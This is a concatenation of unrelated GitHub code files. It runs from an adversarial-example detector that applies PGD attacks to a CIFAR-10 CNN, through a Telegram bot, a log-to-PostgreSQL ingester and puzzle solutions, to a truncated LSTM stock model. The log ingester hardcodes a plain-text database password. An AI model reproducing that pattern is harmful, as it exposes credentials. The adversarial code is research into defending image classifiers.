parser.add_argument( '--epochs', type = int, default = 50, help = 'The number of epochs to run')\r\n parser.add_argument( '--epsilon', type = float, default = 0.1, help = 'Perturbed image pixel adjustment factor' )\r\n parser.add_argument( '--cuda', type = str, default = 'True', help = 'Availability of cuda' )\r\n parser.add_argument( '--cnn', type = str, default = 'cnn.state', help = 'Path to CNN Model State' )\r\n parser.add_argument( '--recon', type = str, default = 'recon.state', help = 'Path to Reconstructor Model State' )\r\n parser.add_argument( '--detect', type = str, default = 'detect.state', help = 'Path to Detector Model State' )\r\n args = parser.parse_args( )\r\n\r\n print( \"Creating Dataloader\" )\r\n data = Data( args.dataset, args.data_path, args.batch_size )\r\n\r\n print( \"Creating Models\" )\r\n cnn = CNN( data.channels, args.cuda )\r\n recon = Reconstructor( data.channels, args.cuda )\r\n detect = Detector( data.channels * 4, args.cuda )\r\n meta = MetaCNN( data.channels, args )\r\n\r\n if( os.path.exists( args.cnn ) ):\r\n print( \"Loading CNN state\" )\r\n cnn.Load( args.cnn )\r\n if( os.path.exists( args.recon ) ):\r\n print( \"Loading Reconstructor state\" )\r\n recon.Load( args.recon )\r\n if( os.path.exists( args.detect ) ):\r\n print( \"Loading Detector state\" )\r\n detect.Load( args.detect )\r\n\r\n adversary = Adversary( cnn )\r\n\r\n if( args.mode == 'cnn' ):\r\n cnn.Train( data.train_loader, args.epochs, args.batch_size )\r\n acc = cnn.Test( data.test_loader, args.batch_size )\r\n if( acc > cnn.accuracy ):\r\n Save( cnn, acc, cnn.epochs + args.epochs, args.cnn )\r\n elif( args.mode == 'recon' ):\r\n recon.Train( cnn, data.train_loader, args.epochs, args.batch_size )\r\n Save( recon, 0, recon.epochs + recon.epochs, args.recon )\r\n elif( args.mode == 'detect' ):\r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.train_loader )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n metaloader = adversary.CreateDetectorLoader( cnn, recon, successLoader, advloader )\r\n detect.Train( metaloader, args.epochs, args.batch_size )\r\n\r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.test_loader )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n metaloader = adversary.CreateDetectorLoader( cnn, recon, data.test_loader, advloader )\r\n acc = detect.Test( metaloader, args.batch_size )\r\n if( acc > detect.accuracy ):\r\n Save( detect, acc, detect.epochs + args.epochs, args.detect )\r\n elif( args.mode == 'test' ):\r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.test_loader )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n metaloader = adversary.CreateMetaLoader( data.test_loader, advloader )\r\n acc = meta.Test( metaloader, args.batch_size )\r\n\r\n elif( args.mode == 'adversary' ):\r\n labelStr = [ 'airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck' ]\r\n cnn.eval( )\r\n recon.eval( )\r\n accuracies = []\r\n \r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.test_loader )\r\n accuracies.append( cnn.Test( successLoader, args.batch_size ) )\r\n print( \"Generating Adversarial Images\" )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n print( \"Evaluating Adversarial 
Images\" )\r\n accuracies.append( cnn.Test( advloader, args.batch_size ) )\r\n\r\n print( \"Saving Adversarial Image Examples\" )\r\n # 0, 1, 2, 3, 4, 5, 6, 7, 8, 9\r\n examples = [ ]\r\n for i in range( len( labelStr ) ):\r\n examples.append( { 'total' : 0, 'cl1' : 0, 'cl2' : 0, 'cl3' : 0 } )\r\n \r\n progress = ProgressBar( 40, 80 )\r\n for batchIndex in range( len( results ) ):\r\n labelBatch = results[ batchIndex ][ 'label' ] \r\n originalBatch = results[ batchIndex ][ 'orig' ]\r\n originalOut = cnn( originalBatch.cuda( ) )\r\n originalPred = originalOut.max( 1, keepdim = True )[ 1 ]\r\n adversaryBatch = results[ batchIndex ][ 'adv' ]\r\n adversaryOut = cnn( adversaryBatch.cuda( ) )\r\n adversaryPred = adversaryOut.max( 1, keepdim = True )[ 1 ]\r\n \r\n for i in range( len( adversaryOut ) ):\r\n # If the Adversary prediction does not equal the correct label and the example count for the label is less than 100 \r\n if( ( adversaryPred[ i ] != labelBatch[ i ] ) and ( examples[ labelBatch[ i ] ][ 'total' ] < 100 ) ):\r\n examples[ labelBatch[ i ] ][ 'total' ] += 1\r\n \r\n # Obtain the reconstructed image for the original and adversarial inputs after convolutional layers 1, 2, and 3\r\n orig1, orig2, orig3 = recon( { 'model' : cnn, 'input' : originalBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n advs1, advs2, advs3 = recon( { 'model' : cnn, 'input' : adversaryBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n\r\n # Obtain the classification for the original and adversarial inputs after convolutional layers 1, 2, and 3\r\n corig1, corig2, corig3 = classifier( { 'model' : cnn, 'input' : originalBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n cadvs1, cadvs2, cadvs3 = classifier( { 'model' : cnn, 'input' : adversaryBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n \r\n if( cadvs1.max( 1, keepdim = True )[ 1 ] != corig1.max( 1, keepdim = True )[ 1 ] ):\r\n examples[ labelBatch[ i ] ][ 'cl1' ] += 1\r\n elif( cadvs2.max( 1, keepdim = True )[ 1 ] != corig2.max( 1, keepdim = True )[ 1 ] ):\r\n examples[ labelBatch[ i ] ][ 'cl2' ] += 1\r\n elif( cadvs3.max( 1, keepdim = True )[ 1 ] != corig3.max( 1, keepdim = True )[ 1 ] ):\r\n examples[ labelBatch[ i ] ][ 'cl3' ] += 1\r\n \r\n # Ensure folder exists to store example images\r\n folder = 'Images/Epsilon{}/'.format( args.epsilon )\r\n if( not os.path.exists( folder ) ):\r\n os.mkdir( folder )\r\n folder = os.path.join( folder, labelStr[ labelBatch[ i ] ] )\r\n if( not os.path.exists( folder ) ):\r\n os.mkdir( folder )\r\n \r\n # Save the original, adversarial, reconstructed, and delta images\r\n utils.save_image( originalBatch[ i ], os.path.join( folder, 'Example{}-O.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( adversaryBatch[ i ], os.path.join( folder, 'Example{}-A.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( orig1, os.path.join( folder, 'Example{}-O-CL1-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ corig1.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( orig2, os.path.join( folder, 'Example{}-O-CL2-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ corig2.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( orig3, os.path.join( folder, 'Example{}-O-CL3-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ corig3.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs1, os.path.join( folder, 'Example{}-A-CL1-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ cadvs1.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs2, os.path.join( folder, 
'Example{}-A-CL2-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ cadvs2.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs3, os.path.join( folder, 'Example{}-A-CL3-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ cadvs3.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs1 - orig1, os.path.join( folder, 'Example{}-D-CL1.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( advs2 - orig2, os.path.join( folder, 'Example{}-D-CL2.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( advs3 - orig3, os.path.join( folder, 'Example{}-D-CL3.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n \r\n filename = os.path.join( folder, 'classification.csv' )\r\n if( not os.path.exists( filename ) ):\r\n with open( filename, 'w', newline='' ) as csvfile:\r\n csvWriter = csv.writer( csvfile, delimiter = ',', quotechar = '|', quoting = csv.QUOTE_MINIMAL )\r\n csvWriter.writerow( [ 'OL1', 'OL2', 'OL3', 'AL1', 'AL2', 'AL3' ] )\r\n \r\n with open( filename, 'a+', newline='' ) as csvfile:\r\n csvWriter = csv.writer( csvfile, delimiter = ',', quotechar = '|', quoting = csv.QUOTE_MINIMAL )\r\n csvWriter.writerow( [ labelStr[ corig1.max( 1, keepdim = True )[ 1 ] ], labelStr[ corig2.max( 1, keepdim = True )[ 1 ] ], labelStr[ corig3.max( 1, keepdim = True )[ 1 ] ], \r\n labelStr[ cadvs1.max( 1, keepdim = True )[ 1 ] ], labelStr[ cadvs2.max( 1, keepdim = True )[ 1 ] ], labelStr[ cadvs3.max( 1, keepdim = True )[ 1 ] ] ] )\r\n # Update Progress\r\n progress.Update( batchIndex, len( results ), '' )\r\n with open( \"Images/Epsilon{}/Statistics.csv\".format( args.epsilon ), 'w', newline='' ) as csvfile:\r\n csvWriter = csv.writer( csvfile, delimiter = ',', quotechar = '|', quoting = csv.QUOTE_MINIMAL )\r\n csvWriter.writerow( [ 'label', 'Total Examples', 'CL1 Mismatch', 'CL2 Mismatch', 'CL3 Mismatch' ] )\r\n for i in range( len( examples ) ):\r\n csvWriter.writerow( [ labelStr[ i ], examples[ i ][ 'total' ], examples[ i ][ 'cl1' ], examples[ i ][ 'cl2' ], examples[ i ][ 'cl3' ] ] )\r\n\r\n##\r\n# @brief\r\n# Save Model State\r\n#\r\n# @details\r\n# This method saves the given model state as well as records the accuracy and number epochs run to the path provided.\r\n#\r\n# @param model CNN Model\r\n# @param acc Model evaluation accuracy\r\n# @param epoch Number of epochs performed\r\n# @param path File path\r\ndef Save( model, acc, epoch, path ):\r\n print( 'Saving...' )\r\n state = {\r\n 'model': model.state_dict( ),\r\n 'acc': acc,\r\n 'epoch': epoch,\r\n }\r\n torch.save( state, path )\r\n print( 'Save complete.' 
)\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit( int( Main( ) or 0 ) )\r\n \r\n","repo_name":"bergermeister/CPSC-597","sub_path":"AdversarialDetection/AdversarialDetection.py","file_name":"AdversarialDetection.py","file_ext":"py","file_size_in_byte":11895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42823709832","text":"from aiogram import types\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.dispatcher import FSMContext\n\nfrom ...db.models import User\nfrom ...db.utils import get_tasks_for_user\nfrom ..utils.general_utils import res_dict, generate_inline_keyboard_for_tasks\n\n\ndef generate_reply_keyboard_for_tasks_start():\n keyboard = InlineKeyboardMarkup()\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n return keyboard\n\n\ndef generate_reply_keyboard_for_tasks():\n keyboard = InlineKeyboardMarkup()\n keyboard.add(InlineKeyboardButton('Назад', callback_data='back'))\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n return keyboard\n\n\ndef generate_reply_keyboard_for_tasks_done():\n keyboard = InlineKeyboardMarkup()\n keyboard.add(InlineKeyboardButton('Назад', callback_data='back'))\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n keyboard.insert(InlineKeyboardButton('Подтверждаю', callback_data='done'))\n return keyboard\n\n\n# ☑️ ☐\nasync def generate_reply_keyboard_for_tasks_spheres(state: FSMContext):\n keyboard = InlineKeyboardMarkup()\n even = True\n async with state.proxy() as data:\n spheres = data['spheres']\n for key, sphere in spheres.items():\n checked = \"☑️ \" if sphere else '☐ ' # TODO поискать другие эмодзи\n if even:\n keyboard.add(InlineKeyboardButton(checked + key, callback_data=key))\n else:\n keyboard.insert(InlineKeyboardButton(checked + key, callback_data=key))\n even = not even\n keyboard.add(InlineKeyboardButton('Назад', callback_data='back'))\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n keyboard.insert(InlineKeyboardButton('Подтвердить', callback_data='done'))\n return keyboard\n\n\nasync def send_profile(db_user: User, message: types.Message):\n to_send = res_dict['profile_representative'].format(db_user.real_fullname, db_user.phone_n,\n len(get_tasks_for_user(db_user, (\n 'awaiting_confirmation', 'awaiting_specialist',\n 'in_work'))),\n len(get_tasks_for_user(db_user, (\n 'closed_with_success', 'canceled_by_represented',\n 'closed_by_other_reason'))))\n keyboard = InlineKeyboardMarkup()\n keyboard.insert(InlineKeyboardButton('Редактировать', callback_data='edit_profile'))\n await message.answer(to_send, parse_mode='html', reply_markup=keyboard)\n\n\n# async def generate_inline_keyboard_for_tasks(state: FSMContext, page_n: int, type_: str):\n# async with state.proxy() as state_data:\n# tasks_list = state_data[f'tasks_{type_}']\n# if page_n * 9 > len(tasks_list):\n# return False\n# else:\n# reply_markup = types.InlineKeyboardMarkup()\n# for index, task in enumerate(tasks_list[page_n * 9:(page_n + 1) * 9]):\n# callback_data_to_input = f\"task_info {task.id} {page_n} {type_}\"\n# reply_markup.add(types.InlineKeyboardButton(f\"{page_n * 9 + (index + 1)}. 
{task.name}\"[:60],\n# callback_data=callback_data_to_input))\n# reply_markup.row()\n# # cp_history - change page in history\n# if page_n != 0:\n# reply_markup.insert(types.InlineKeyboardButton(\"<<\", callback_data=f'cp_tasks {page_n - 1} {type_}'))\n# if (page_n + 1) * 9 < len(tasks_list):\n# reply_markup.insert(types.InlineKeyboardButton(\">>\", callback_data=f'cp_tasks {page_n + 1} {type_}'))\n# return reply_markup\n\n\nasync def tasks_history(db_user: User, message: types.Message, state: FSMContext):\n tasks = get_tasks_for_user(db_user, ('closed_with_success', 'canceled_by_represented', 'closed_by_other_reason'))\n if tasks:\n async with state.proxy() as state_data:\n state_data['tasks_history'] = tasks\n await message.answer('История задач, которые Вы добавляли. \\nЧтобы получить больше информации, нажмите на '\n 'задачу.',\n parse_mode='html',\n reply_markup=await generate_inline_keyboard_for_tasks(state, 0, 'history'))\n else:\n await message.answer('На данный момент вы не добавили ни одной задачи', )\n\n\nasync def tasks_current(db_user: User, message: types.Message, state: FSMContext):\n tasks = get_tasks_for_user(db_user, ('awaiting_confirmation', 'awaiting_specialist', 'in_work'))\n if tasks:\n async with state.proxy() as state_data:\n state_data['tasks_current'] = tasks\n await message.answer(\n 'Текущие задачи, которые Вы добавляли. \\nЧтобы получить больше информации и редактировать, нажмите на '\n 'задачу.',\n parse_mode='html', reply_markup=await generate_inline_keyboard_for_tasks(state, 0, 'current'))\n else:\n await message.answer('На данный момент вы не добавляли какие-либо задачи, чтобы получить задание, зайдите в '\n 'меню \"Список доступных задач\"')\n","repo_name":"tainella/Digitalyouth_ITbound_Bot","sub_path":"app/bot/utils/representative_utils.py","file_name":"representative_utils.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40294488505","text":"import re\r\nimport psycopg2\r\n\r\n# Database connection details\r\ndb_host = 'localhost'\r\ndb_name = 'konark'\r\ndb_user = 'postgres'\r\ndb_password = 't@rHB123'\r\n\r\n# Connect to the PostgreSQL database\r\ntry:\r\n conn = psycopg2.connect(\r\n host=db_host,\r\n database=db_name,\r\n user=db_user,\r\n password=db_password\r\n )\r\n cursor = conn.cursor()\r\nexcept (Exception, psycopg2.Error) as error:\r\n print(\"Error while connecting to PostgreSQL:\", error)\r\n exit()\r\n\r\n# Regular expressions for log line parsing\r\napache_log_regex = re.compile(r'^(\\S+)\\s+\\S+\\s+(\\S+)\\s+\\[(.*?)\\]\\s+\"(\\S+)\\s+(\\S+)\\s+HTTP/\\d\\.\\d\"\\s+(\\d+)\\s+(\\d+)\\s+\"([^\"]+)\"')\r\nexim4_log_regex = re.compile(r'^(\\S+)\\s+\\S+\\s+(\\S+)\\s+<([^>]+)>\\s+.*\\s+id=.*\\s+(.*):\\s+(.*);\\s+(.*)')\r\n\r\n# Log file paths\r\napache_log_file = r'insert path here'\r\nexim4_log_file = r'insert path here'\r\n\r\n# Function to insert Apache log entries into the database\r\ndef insert_apache_log_entry(log_entry):\r\n query = \"INSERT INTO apache_logs (remote_host, timestamp, request_method, requested_url, http_status_code, bytes_transferred, user_agent) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\r\n try:\r\n cursor.execute(query, log_entry)\r\n except (Exception, psycopg2.Error) as error:\r\n print(\"Error while inserting Apache log entry:\", error)\r\n raise\r\n\r\n# Function to insert Exim4 log entries into the database\r\ndef insert_exim4_log_entry(log_entry):\r\n query = \"INSERT INTO exim4_logs (timestamp, sender, recipient, 
message, status, error_message) VALUES (%s, %s, %s, %s, %s, %s)\"\r\n try:\r\n cursor.execute(query, log_entry)\r\n except (Exception, psycopg2.Error) as error:\r\n print(\"Error while inserting Exim4 log entry:\", error)\r\n raise\r\n\r\n# Read and parse Apache log file\r\ntry:\r\n with open(apache_log_file, 'r') as file:\r\n for line in file:\r\n match = apache_log_regex.match(line)\r\n if match:\r\n log_entry = match.groups()\r\n insert_apache_log_entry(log_entry)\r\nexcept FileNotFoundError as error:\r\n print(\"Error while reading Apache log file:\", error)\r\n exit()\r\n\r\n# Read and parse Exim4 log file\r\ntry:\r\n with open(exim4_log_file, 'r') as file:\r\n for line in file:\r\n match = exim4_log_regex.match(line)\r\n if match:\r\n log_entry = match.groups()\r\n insert_exim4_log_entry(log_entry)\r\nexcept FileNotFoundError as error:\r\n print(\"Error while reading Exim4 log file:\", error)\r\n exit()\r\n\r\n# Commit the changes and close the database connection\r\ntry:\r\n conn.commit()\r\n print(\"Log entries inserted into the database.\")\r\nexcept (Exception, psycopg2.Error) as error:\r\n print(\"Error while committing changes to the database:\", error)\r\n# The result of executing this code is\r\n# lilyi/OneDrive/Documents/GitHub/bharatc12.github.io/ingest script.py\"\r\n# Log entries inserted into the database.\r\nconn.close()\r\n\r\n","repo_name":"bharatc12/konark","sub_path":"ingest script.py","file_name":"ingest script.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34724536898","text":"def front(a):\n front = a\n front = front.replace('2', 'x').replace('3', '2').replace('x', '3')\n return front\n\ndef behind(a):\n behind = a\n behind = behind.replace('1', 'x').replace('2', '1').replace('x', '2')\n return behind\n\nN = int(input())\n\nans = \"1 3\"\n\nfor i in range(N - 1):\n ans = front(ans) + \"1 3\" + behind(ans)\n\nprint(2 ** N - 1)\nfor i in range(0, len(ans), 3):\n print(ans[i:i + 3])\n\n# def hanoi_tower(n, source, auxiliary, target):\n# if n == 1:\n# print(source, target)\n# else:\n# hanoi_tower(n - 1, source, target, auxiliary)\n# print(source, target)\n# hanoi_tower(n - 1, auxiliary, source, target)\n\n# N = int(input())\n# total_moves = 2**N - 1\n# print(total_moves)\n\n# hanoi_tower(N, 1, 2, 3)","repo_name":"hjh3229/algorithm","sub_path":"src/baekjoon/sort/bj_11729.py","file_name":"bj_11729.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21601484875","text":"from copy import deepcopy\n\nt = int(input())\nans = []\nfor _ in range(t):\n n = int(input())\n dic = {}\n for i in range(n):\n print(dic)\n pname = input()\n m, *ingrid = input().split()\n singrid = set(ingrid)\n j, *engrid = input().split()\n sengrid = set(engrid)\n for grid in ingrid:\n if grid in dic:\n dic[grid] = dic[grid] & sengrid\n else:\n dic[grid] = deepcopy(sengrid)\n for key in dic.keys():\n if key not in singrid:\n dic[key] = dic[grid] - sengrid\n at = []\n for i in dic.keys():\n for j in dic[i]:\n at.append([i,j])\n ans.append(at)\nprint(\"\\n\".join(\"\\n\".join(\"(\"+i[0]+\", \"+i[1]+\")\" for i in j) for j in ans))","repo_name":"Programmerryoki/Competitive-Programming","sub_path":"Kattis Problems/Problems/Pizza Hawaii.py","file_name":"Pizza 
Hawaii.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43372690528","text":"# You are given a binary string s consisting only of zeroes and ones.\n# A substring of s is considered balanced if all zeroes are before ones and the number\n# of zeroes is equal to the number of ones inside the substring.\n# Notice that the empty substring is considered a balanced substring.\n# Return the length of the longest balanced substring of s.\n# A substring is a contiguous sequence of characters within a string.\n# --------------------\n# 1 <= s.length <= 50\n# '0' <= s[i] <= '1'\n\n\ndef find_the_longest(s: str) -> int:\n # working_sol (85.05%, 95.36%) -> (47ms, 16.19mb) time: O(n) | space: O(1)\n # All pairs.\n all_count: int = 0\n # Zeroes to build pair with.\n count_zeroes: int = 0\n # Current index of input_s.\n index: int = 0\n while index != len(s):\n # Count '0' and move on.\n if s[index] == '0':\n count_zeroes += 1\n index += 1\n continue\n # We can start counting pairs.\n if s[index] == '1':\n # There's no '0' pair to build with.\n if count_zeroes == 0:\n index += 1\n continue\n # Current substring size.\n current_count: int = 0\n # If there's '0' left, we can try to build a pair.\n while count_zeroes != 0:\n current_count += 1\n index += 1\n # All array is used or reset of zeroes_count.\n if index == len(s) or s[index] != '1':\n count_zeroes = 0\n break\n count_zeroes -= 1\n # We need maximum correct substring.\n all_count = max(current_count, all_count)\n return all_count * 2\n\n\n# Time complexity: O(n) -> traversing input_array, once => O(n).\n# Auxiliary space: O(1) -> only 4 constant INTs used, none of them depends on input => O(1).\n# --------------------\n# Should be just counter with start from 0 and breaking when more than count(0) one's(1) met.\n\n\ntest: str = \"01000111\"\ntest_out: int = 6\nassert test_out == find_the_longest(test)\n\ntest = \"00111\"\ntest_out = 4\nassert test_out == find_the_longest(test)\n\ntest = \"111\"\ntest_out = 0\nassert test_out == find_the_longest(test)\n\ntest = \"001\"\ntest_out = 1\nassert test_out == find_the_longest(test)\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p2609_find_the_longest_balanced_substring_of_a_binary_string.py","file_name":"p2609_find_the_longest_balanced_substring_of_a_binary_string.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13676903582","text":"from PySide2.QtCore import (\n Slot, Qt,\n QAbstractTableModel, QModelIndex,\n QTimer,\n)\n\nfrom ReminderApiProvider import ReminderApiProvider\n\n\nclass CollectionTableModel(QAbstractTableModel):\n __update_timeout = 10_000\n __columns = ['original', 'translation', 'transcription']\n\n def __init__(self, provider, collection, parent=None):\n super().__init__(parent)\n self._api: ReminderApiProvider = provider\n self._collection = collection\n self._objects = list()\n self._timer = QTimer(self)\n\n self._timer.timeout.connect(self.update_model)\n\n self._timer.start(self.__update_timeout)\n self.update_model()\n\n def columnCount(self, parent=QModelIndex()) -> int:\n return len(self.__columns)\n\n def rowCount(self, parent=QModelIndex()) -> int:\n return len(self._objects)\n\n def data(self, index, role=Qt.DisplayRole):\n if role == Qt.DisplayRole:\n row, column = index.row(), index.column()\n\n if row < self.rowCount() and column < 
self.columnCount():\n                return self.__get_display_data(row, column)\n\n        return None\n\n    def headerData(self, section, orientation, role=Qt.DisplayRole):\n        return self.__columns[section] \\\n            if orientation == Qt.Horizontal and role == Qt.DisplayRole \\\n            else None\n\n    def object(self, row):\n        return self._objects[row]\n\n    @Slot()\n    def update_model(self):\n        objects = self._api.get_objects(self._collection)\n\n        if objects != self._objects:\n            self.beginResetModel()\n            self._objects = objects\n            self.endResetModel()\n\n    def __get_display_data(self, row: int, column: int) -> str:\n        try:\n            return self._objects[row][self.__columns[column]]\n        except KeyError:\n            return 'NULL'\n","repo_name":"ukolovka/RA_Pyhton","sub_path":"06/src/DesktopApplication/CollectionTableModel.py","file_name":"CollectionTableModel.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31910038317","text":"#\n# @lc app=leetcode.cn id=15 lang=python3\n#\n# [15] 3Sum (三数之和)\n# Two-pointer method: when enumerating two elements of the array, if the second element must decrease as the first one increases, the inner double loop can be replaced with two pointers\n\n# @lc code=start\nclass Solution:\n    def threeSum(self, nums: List[int]) -> List[List[int]]:\n        nums.sort()\n        numsLen = len(nums)\n        ans = []\n        # enumerate a\n        for first in range(numsLen):\n            if nums[first]>0:\n                return ans\n            # skip adjacent duplicates!\n            if first>0 and nums[first]==nums[first-1]:\n                continue\n            # target: -nums[first] is fixed; against this fixed value use two pointers, since\n            # after sorting, when L grows, R must shrink\n            L = first+1\n            R = numsLen - 1\n            while(L<R):\n                s = nums[first]+nums[L]+nums[R]\n                if s==0:\n                    ans.append([nums[first],nums[L],nums[R]])\n                    while L<R and nums[L]==nums[L+1]:\n                        L=L+1\n                    while L<R and nums[R]==nums[R-1]:\n                        R=R-1\n                    L=L+1\n                    R=R-1\n                elif s>0:\n                    R=R-1\n                else:\n                    L=L+1\n        return ans\n\n\n# @lc code=end\n\n","repo_name":"nbdfls/leetcode","sub_path":"python解题/15.三数之和.py","file_name":"15.三数之和.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33456191092","text":"import os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nkb = tf.keras.backend\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport matplotlib.pyplot as plt\n\nfrom config_20XX import *\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom data_util import *\n\nnp.random.seed(150)\n\n\n\n# Custom loss function to reward correct sign\ndef elliptic_paraboloid_loss(x, y):\n    # Compute a rotated elliptic paraboloid.\n    r = np.pi / 4\n    x_rot = (x * np.cos(r)) + (y * np.sin(r))\n    y_rot = (x * -np.sin(r)) + (y * np.cos(r))\n    z = ((x_rot**2) / C_DIFF_SIGN) + ((y_rot**2) / C_SAME_SIGN)\n    return z\n\n# Load previously saved model\ndef load_model(model_path):\n\treturn tf.keras.models.load_model(model_path)\n\n# Create the model\ndef generate_model(input_shape):\n\t# Model definition\n\tl1 = tf.keras.regularizers.l1\n\tl2 = tf.keras.regularizers.l2\n\tmodel = tf.keras.models.Sequential([\n\t    # Shape [batch, time, features] => [batch, time, lstm_units]\n\t    tf.keras.layers.LSTM(4, input_shape=input_shape, return_sequences=True, activation='relu'),\n\t    tf.keras.layers.LSTM(8, input_shape=input_shape, return_sequences=True, activation='tanh'),\n\t    tf.keras.layers.LSTM(16, input_shape=input_shape, return_sequences=True, activation='tanh'),\n\t    tf.keras.layers.LSTM(32, input_shape=input_shape, return_sequences=False, activation='relu'),\n\t    #tf.keras.layers.Dense(7, input_shape=frame_shape),\n\t    tf.keras.layers.Dense(units=256, activation='relu'),\n\t    tf.keras.layers.Dropout(0.25),\n\t    tf.keras.layers.Dense(units=128, activation='softmax'),\n\t    tf.keras.layers.Dense(units=64, activation='relu', kernel_regularizer=l2(0.05)),\n\t    tf.keras.layers.Dense(units=32, activation='tanh', 
kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=16, activation='relu', kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=8, activation='relu', kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=1)\n\t])\n\n\tearly_stopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n\t patience=PATIENCE,\n\t mode='min')\n\n\tmodel.compile(loss=elliptic_paraboloid_loss,\n\t optimizer=tf.optimizers.Adam(),\n\t metrics=[elliptic_paraboloid_loss])\n\n\treturn model\n\n\n# Train the model (and validate)\ndef train_model(model, train_x, train_y, val_x, val_y):\n\tprint(\"************** TRAINING MODEL **************\")\n\tmodel.fit(train_x, train_y, epochs=MAX_EPOCHS, validation_data=(val_x, val_y))\n\n# Evaluate model\ndef eval_model(stock_ticker, model, test_x, test_y, display=False):\n\ttest_predict = model.predict(test_x)\n\tindices = list(range(len(test_predict)))\n\n\tbuys, sells = [0, 0], [0, 0]\n\tall_trades = [buys, sells]\n\n\tfor i in range(len(test_predict)):\n\t\ttrade_type = int(test_predict[i] <= 0)\n\t\ttrade_result = int(test_predict[i] * test_y[i] >= 0)\n\t\tall_trades[trade_type][trade_result] += 1\n\t \n\tprint(\"\")\n\tprint(\"CORRECT BUYS: %d | WRONG BUYS: %d\" % (buys[1], buys[0]))\n\tprint(\"CORRECT SELLS: %d | WRONG SELLS: %d\" % (sells[1], sells[0]))\n\n\tif display:\n\t\tplt.title(stock_ticker + \" Stock Prediction\")\n\t\tax = plt.axes()\n\t\tax.set_xlabel(\"Time\")\n\t\tax.set_ylabel(\"Price Deviation\")\n\t\tplt.plot(indices, [y[0] for y in test_predict], 'b-', marker='.', label='Predict')\n\t\tplt.plot(indices, [y[0] for y in test_y], 'r-', marker='.', label='Actual')\n\t\tplt.plot(indices, [0 for _ in test_predict], 'k-')\n\t\tplt.legend()\n\t\tplt.show()\n\n\n\n# Run `python3 model.py` to see how it measures up against validation data\nif __name__ == '__main__':\n\n\tif len(sys.argv) < 2:\n\t\tprint('ERROR: Need to specify a ticker')\n\t\texit(1)\n\n\tstock_ticker = sys.argv[1]\n\n\tstock_raw, stock_dat, stock_labels = model_stock_data(stock_ticker)\n\ttrain_x, train_y, test_x, test_y = partition_data(TRAINING_SET_THRESH, stock_dat, stock_labels)\n\ttrain_x, train_y, val_x, val_y = partition_data(TRAINING_SET_THRESH, train_x, train_y)\n\tinput_frame_shape = 